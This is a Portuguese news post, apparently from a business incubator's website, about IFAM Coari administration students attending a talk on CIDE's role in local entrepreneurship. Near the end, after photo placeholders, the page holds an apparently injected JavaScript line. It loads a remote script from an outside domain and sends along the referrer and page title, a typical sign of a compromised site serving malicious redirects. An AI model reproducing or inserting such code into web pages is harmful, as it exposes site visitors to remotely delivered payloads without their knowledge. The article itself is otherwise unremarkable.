Estudantes do IFAM de Coari ouvem palestra no CIDE

Pale1
O diretor-executivo do CIDE fala aos estudantes de Coari.

Com o objetivo de complementar as aulas estudadas no curso técnico de Administração, em torno de cinquenta estudantes do Instituto Federal do Amazonas (IFAM Campus-Coari) ouviram, na manhã de hoje, 11, uma palestra sobre “O papel da incubadora CIDE no empreendedorismo local”, proferida pelo diretor-executivo, José Barbosa Grosso, que, após a exposição, convidou os alunos e professores a visitar algumas empresas instaladas na incubadora.

“É bom que os estudantes de administração aumentem seus conhecimentos adquiridos em sala de aula, visitando empresas inovadoras que um dia foram uma ideia e hoje se tornaram realidade”, disse José Grosso.

Segundo o professor José Wulisses, a visita está relacionada com as atividades desenvolvidas pelo curso de Administração. “O motivo é claro. Trouxemos os estudantes para que eles conheçam o ambiente de uma incubadora de empresas, unindo a parte teórica com a prática”.

Para a formanda Pâmela Rodrigues a visita foi impressionante. “Ouvimos falar de empreendedorismo na sala do curso, mas vir aqui e conhecer pessoalmente os trabalhos desenvolvidos na incubadora acrescenta conhecimento às aulas teóricas”, concluiu.

Pale3Pale2Pale4

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *